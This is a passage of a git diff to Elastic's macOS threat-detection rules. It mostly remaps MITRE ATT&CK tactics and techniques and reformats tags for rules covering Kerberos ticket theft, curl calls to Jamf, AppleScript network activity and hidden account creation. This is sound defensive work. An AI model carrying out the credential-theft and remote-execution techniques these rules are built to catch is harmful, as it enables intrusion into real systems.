+[[rule.threat.technique.subtechnique]] +id = "T1547.006" +name = "Kernel Modules and Extensions" +reference = "https://attack.mitre.org/techniques/T1547/006/" + + + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/discovery_full_disk_access_check.toml b/rules/macos/discovery_full_disk_access_check.toml index 02e5c37b70d..58b259b52dd 100644 --- a/rules/macos/discovery_full_disk_access_check.toml +++ b/rules/macos/discovery_full_disk_access_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -72,12 +72,30 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" + [rule.threat.tactic] + name = "Discovery" + id = "TA0007" + reference = "https://attack.mitre.org/tactics/TA0007/" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat.technique]] + name = "File and Directory Discovery" + id = "T1083" + reference = "https://attack.mitre.org/techniques/T1083/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" + + [[rule.threat.technique]] + name = "Abuse Elevation Control Mechanism" + id = "T1548" + reference = "https://attack.mitre.org/techniques/T1548/" + + [[rule.threat.technique.subtechnique]] + name = "TCC Manipulation" + id = "T1548.006" + reference = "https://attack.mitre.org/techniques/T1548/006/" diff --git a/rules/macos/discovery_suspicious_sip_check.toml b/rules/macos/discovery_suspicious_sip_check.toml index e2fd4a9eab1..cf48e7fe8b7 100644 --- a/rules/macos/discovery_suspicious_sip_check.toml +++ b/rules/macos/discovery_suspicious_sip_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -74,30 +74,22 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1497" -name = "Virtualization/Sandbox Evasion" -reference = "https://attack.mitre.org/techniques/T1497/" - -[[rule.threat.technique.subtechnique]] -id = "T1497.001" -name = "System Checks" -reference = "https://attack.mitre.org/techniques/T1497/001/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1082" -name = "System Information Discovery" -reference = "https://attack.mitre.org/techniques/T1082/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" + [rule.threat.tactic] + name = "Discovery" + id = "TA0007" + reference = "https://attack.mitre.org/tactics/TA0007/" + + [[rule.threat.technique]] + name = "System Information Discovery" + id = "T1082" + reference = "https://attack.mitre.org/techniques/T1082/" + + [[rule.threat.technique]] + name = "Virtualization/Sandbox Evasion" + id = "T1497" + reference = "https://attack.mitre.org/techniques/T1497/" + + [[rule.threat.technique.subtechnique]] + name = "System Checks" + id = "T1497.001" + reference = "https://attack.mitre.org/techniques/T1497/001/" diff --git a/rules/macos/discovery_system_and_network_configuration_check.toml b/rules/macos/discovery_system_and_network_configuration_check.toml index c19554c1387..05dfd0e7ded 100644 --- a/rules/macos/discovery_system_and_network_configuration_check.toml +++ b/rules/macos/discovery_system_and_network_configuration_check.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -71,12 +71,17 @@ file where host.os.type == "macos" and event.action == "open" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1016" -name = "System Network Configuration Discovery" -reference = "https://attack.mitre.org/techniques/T1016/" + [rule.threat.tactic] + name = "Discovery" + id = "TA0007" + reference = "https://attack.mitre.org/tactics/TA0007/" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat.technique]] + name = "System Information Discovery" + id = "T1082" + reference = "https://attack.mitre.org/techniques/T1082/" + + [[rule.threat.technique]] + name = "System Network Configuration Discovery" + id = "T1016" + reference = "https://attack.mitre.org/techniques/T1016/" diff --git a/rules/macos/discovery_users_domain_built_in_commands.toml b/rules/macos/discovery_users_domain_built_in_commands.toml index 94be2280f1e..6720bc025b4 100644 --- a/rules/macos/discovery_users_domain_built_in_commands.toml +++ b/rules/macos/discovery_users_domain_built_in_commands.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -105,38 +105,29 @@ Built-in macOS commands like `ldapsearch`, `dsmemberutil`, and `dscl` are essent [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1069" name = "Permission Groups Discovery" reference = "https://attack.mitre.org/techniques/T1069/" - [[rule.threat.technique.subtechnique]] id = "T1069.001" name = "Local Groups" reference = "https://attack.mitre.org/techniques/T1069/001/" -[[rule.threat.technique.subtechnique]] -id = "T1069.002" -name = "Domain Groups" -reference = "https://attack.mitre.org/techniques/T1069/002/" [[rule.threat.technique]] id = "T1087" name = "Account Discovery" reference = "https://attack.mitre.org/techniques/T1087/" - [[rule.threat.technique.subtechnique]] id = "T1087.001" name = "Local Account" reference = "https://attack.mitre.org/techniques/T1087/001/" -[[rule.threat.technique.subtechnique]] -id = "T1087.002" -name = "Domain Account" -reference = "https://attack.mitre.org/techniques/T1087/002/" + [rule.threat.tactic] id = "TA0007" name = "Discovery" reference = "https://attack.mitre.org/tactics/TA0007/" + diff --git a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml index f61613a511a..6ec5857b809 100644 --- a/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml +++ b/rules/macos/execution_defense_evasion_electron_app_childproc_node_js.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -48,7 +48,15 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -95,18 +103,26 @@ Electron applications, built on Node.js, can execute child processes using the ` [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1548" +name = "Abuse Elevation Control Mechanism" +reference = "https://attack.mitre.org/techniques/T1548/" + + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + diff --git a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml index 39cc78ca42e..3280689d092 100644 --- a/rules/macos/execution_initial_access_suspicious_browser_childproc.toml +++ b/rules/macos/execution_initial_access_suspicious_browser_childproc.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -106,31 +106,26 @@ Web browsers are integral to user interaction with the internet, often serving a [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique]] id = "T1203" name = "Exploitation for Client Execution" reference = "https://attack.mitre.org/techniques/T1203/" + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1189" name = "Drive-by Compromise" reference = "https://attack.mitre.org/techniques/T1189/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/macos/execution_installer_package_spawned_network_event.toml b/rules/macos/execution_installer_package_spawned_network_event.toml index d69784d76b8..f54b8347f48 100644 --- a/rules/macos/execution_installer_package_spawned_network_event.toml +++ b/rules/macos/execution_installer_package_spawned_network_event.toml @@ -2,7 +2,7 @@ creation_date = "2021/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/04/21" [rule] author = ["Elastic"] @@ -112,36 +112,36 @@ MacOS installer packages, often with a .pkg extension, are used to distribute so [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1071" +name = "Application Layer Protocol" +reference = "https://attack.mitre.org/techniques/T1071/" +[[rule.threat.technique.subtechnique]] +id = "T1071.001" +name = "Web Protocols" +reference = "https://attack.mitre.org/techniques/T1071/001/" + + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/macos/execution_python_shell_spawn_first_occurrence.toml b/rules/macos/execution_python_shell_spawn_first_occurrence.toml index 19c07e9db90..6da50e09b03 100644 --- a/rules/macos/execution_python_shell_spawn_first_occurrence.toml +++ b/rules/macos/execution_python_shell_spawn_first_occurrence.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/23" [rule] author = ["Elastic"] @@ -76,17 +76,10 @@ not process.command_line:(*pip* or *conda* or *brew* or *jupyter*) [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - [[rule.threat.technique.subtechnique]] id = "T1059.006" name = "Python" @@ -96,6 +89,7 @@ reference = "https://attack.mitre.org/techniques/T1059/006/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable"] diff --git a/rules/macos/execution_script_via_automator_workflows.toml b/rules/macos/execution_script_via_automator_workflows.toml index 0fc33f5e576..a5320a95420 100644 --- a/rules/macos/execution_script_via_automator_workflows.toml +++ b/rules/macos/execution_script_via_automator_workflows.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/23" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -97,18 +97,14 @@ Automator, a macOS utility, allows users to automate repetitive tasks through wo [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml index 24770fce50b..f657656b65c 100644 --- a/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml +++ b/rules/macos/execution_scripting_osascript_exec_followed_by_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -108,31 +108,31 @@ AppleScript, a scripting language for macOS, automates tasks by controlling appl [[rule.threat]] framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" - -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" - [[rule.threat.technique.subtechnique]] id = "T1059.002" name = "AppleScript" reference = "https://attack.mitre.org/techniques/T1059/002/" + + [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + diff --git a/rules/macos/execution_shell_execution_via_apple_scripting.toml b/rules/macos/execution_shell_execution_via_apple_scripting.toml index dca693e0d11..03218b38b18 100644 --- a/rules/macos/execution_shell_execution_via_apple_scripting.toml +++ b/rules/macos/execution_shell_execution_via_apple_scripting.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/07" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -101,28 +101,14 @@ AppleScript and JXA are scripting languages used in macOS to automate tasks and [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.007" -name = "JavaScript" -reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + diff --git a/rules/macos/execution_unusual_library_load_via_python.toml b/rules/macos/execution_unusual_library_load_via_python.toml index be7f92e752a..99c96e54eed 100644 --- a/rules/macos/execution_unusual_library_load_via_python.toml +++ b/rules/macos/execution_unusual_library_load_via_python.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -82,12 +82,17 @@ library where host.os.type == "macos" and event.action == "load" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1129" -name = "Shared Modules" -reference = "https://attack.mitre.org/techniques/T1129/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" -[rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat.technique]] + name = "Command and Scripting Interpreter" + id = "T1059" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Python" + id = "T1059.006" + reference = "https://attack.mitre.org/techniques/T1059/006/" diff --git a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml index a5996a567c2..b89f017f619 100644 --- a/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml +++ b/rules/macos/initial_access_suspicious_mac_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/01/04" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/02/04" [rule] author = ["Elastic"] @@ -45,7 +45,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Initial Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -157,43 +164,19 @@ Microsoft Office applications on macOS can be exploited by adversaries to execut [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1059" -name = "Command and Scripting Interpreter" -reference = "https://attack.mitre.org/techniques/T1059/" - -[[rule.threat.technique.subtechnique]] -id = "T1059.002" -name = "AppleScript" -reference = "https://attack.mitre.org/techniques/T1059/002/" - +id = "T1566" +name = "Phishing" +reference = "https://attack.mitre.org/techniques/T1566/" [[rule.threat.technique.subtechnique]] -id = "T1059.004" -name = "Unix Shell" -reference = "https://attack.mitre.org/techniques/T1059/004/" +id = "T1566.001" +name = "Spearphishing Attachment" +reference = "https://attack.mitre.org/techniques/T1566/001/" -[[rule.threat.technique.subtechnique]] -id = "T1059.006" -name = "Python" -reference = "https://attack.mitre.org/techniques/T1059/006/" -[[rule.threat.technique]] -id = "T1203" -name = "Exploitation for Client Execution" -reference = "https://attack.mitre.org/techniques/T1203/" - -[[rule.threat.technique]] -id = "T1204" -name = "User Execution" -reference = "https://attack.mitre.org/techniques/T1204/" - -[[rule.threat.technique.subtechnique]] -id = "T1204.002" -name = "Malicious File" -reference = "https://attack.mitre.org/techniques/T1204/002/" [rule.threat.tactic] -id = "TA0002" -name = "Execution" -reference = "https://attack.mitre.org/tactics/TA0002/" +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + diff --git a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml index 15870020bd0..23775e46154 100644 --- a/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml +++ b/rules/macos/lateral_movement_credential_access_kerberos_bifrostconsole.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/02" [rule] author = ["Elastic"] @@ -103,36 +103,36 @@ Kerberos is a network authentication protocol designed to provide secure identit [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique.subtechnique]] +id = "T1550.003" +name = "Pass the Ticket" +reference = "https://attack.mitre.org/techniques/T1550/003/" + + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" [[rule.threat.technique]] id = "T1558" name = "Steal or Forge Kerberos Tickets" reference = "https://attack.mitre.org/techniques/T1558/" - [[rule.threat.technique.subtechnique]] id = "T1558.003" name = "Kerberoasting" reference = "https://attack.mitre.org/techniques/T1558/003/" + + [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1550" -name = "Use Alternate Authentication Material" -reference = "https://attack.mitre.org/techniques/T1550/" - -[[rule.threat.technique.subtechnique]] -id = "T1550.003" -name = "Pass the Ticket" -reference = "https://attack.mitre.org/techniques/T1550/003/" - -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml index 6244c0b65f5..5d7922d88c6 100644 --- a/rules/macos/lateral_movement_remote_ssh_login_enabled.toml +++ b/rules/macos/lateral_movement_remote_ssh_login_enabled.toml @@ -2,7 +2,7 @@ creation_date = "2020/08/18" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -45,7 +45,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -94,13 +101,19 @@ The `systemsetup` command in macOS is a utility that allows administrators to co [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + + [rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml index e07d5fce074..e96f7b9451c 100644 --- a/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml +++ b/rules/macos/lateral_movement_suspicious_curl_to_jamf_endpoint.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/30" [rule] author = ["Elastic"] @@ -19,7 +19,15 @@ name = "Suspicious Curl to Jamf Endpoint" risk_score = 73 rule_id = "a8256685-9736-465b-b159-f25a172d08e8" severity = "high" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Tactic: Execution", + "Data Source: Elastic Defend", + "Resources: Investigation Guide" +] timestamp_override = "event.ingested" type = "eql" note = """## Triage and analysis @@ -70,12 +78,25 @@ process where host.os.type == "macos" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1072" -name = "Software Deployment Tools" -reference = "https://attack.mitre.org/techniques/T1072/" + [rule.threat.tactic] + name = "Lateral Movement" + id = "TA0008" + reference = "https://attack.mitre.org/tactics/TA0008/" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat.technique]] + name = "Software Deployment Tools" + id = "T1072" + reference = "https://attack.mitre.org/techniques/T1072/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "Software Deployment Tools" + id = "T1072" + reference = "https://attack.mitre.org/techniques/T1072/" diff --git a/rules/macos/lateral_movement_vpn_connection_attempt.toml b/rules/macos/lateral_movement_vpn_connection_attempt.toml index 94da2795aeb..448fb9b9bff 100644 --- a/rules/macos/lateral_movement_vpn_connection_attempt.toml +++ b/rules/macos/lateral_movement_vpn_connection_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/25" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -48,7 +48,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Initial Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Lateral Movement", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -98,13 +105,14 @@ Virtual Private Networks (VPNs) are used to securely connect to remote networks, [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1133" -name = "External Remote Services" -reference = "https://attack.mitre.org/techniques/T1133/" +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + [rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + diff --git a/rules/macos/persistence_account_creation_hide_at_logon.toml b/rules/macos/persistence_account_creation_hide_at_logon.toml index e871422d1c8..8ffa3621827 100644 --- a/rules/macos/persistence_account_creation_hide_at_logon.toml +++ b/rules/macos/persistence_account_creation_hide_at_logon.toml @@ -2,7 +2,7 @@ creation_date = "2020/01/05" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/03/18" [rule] author = ["Elastic"] @@ -44,7 +44,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: macOS", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Persistence", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" @@ -91,31 +98,19 @@ In macOS environments, the `dscl` command-line utility manages directory service [[rule.threat]] framework = "MITRE ATT&CK" - [[rule.threat.technique]] -id = "T1564" -name = "Hide Artifacts" -reference = "https://attack.mitre.org/techniques/T1564/" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.003" +name = "Local Accounts" +reference = "https://attack.mitre.org/techniques/T1078/003/" -[[rule.threat.technique]] -id = "T1136" -name = "Create Account" -reference = "https://attack.mitre.org/techniques/T1136/" -[[rule.threat.technique.subtechnique]] -id = "T1136.001" -name = "Local Account" -reference = "https://attack.mitre.org/techniques/T1136/001/" [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" + diff --git a/rules/macos/persistence_apple_mail_rule_modification.toml b/rules/macos/persistence_apple_mail_rule_modification.toml index 22c83563e54..4e7a49b2daa 100644 --- a/rules/macos/persistence_apple_mail_rule_modification.toml +++ b/rules/macos/persistence_apple_mail_rule_modification.toml @@ -2,7 +2,7 @@ creation_date = "2026/01/30" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/09" [rule] author = ["Elastic"] @@ -81,12 +81,25 @@ file where host.os.type == "macos" and event.type != "deletion" and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1546" -name = "Event Triggered Execution" -reference = "https://attack.mitre.org/techniques/T1546/" + [rule.threat.tactic] + name = "Persistence" + id = "TA0003" + reference = "https://attack.mitre.org/tactics/TA0003/" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" + [[rule.threat.technique]] + name = "Event Triggered Execution" + id = "T1546" + reference = "https://attack.mitre.org/techniques/T1546/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" + + [[rule.threat.technique]] + name = "User Execution" + id = 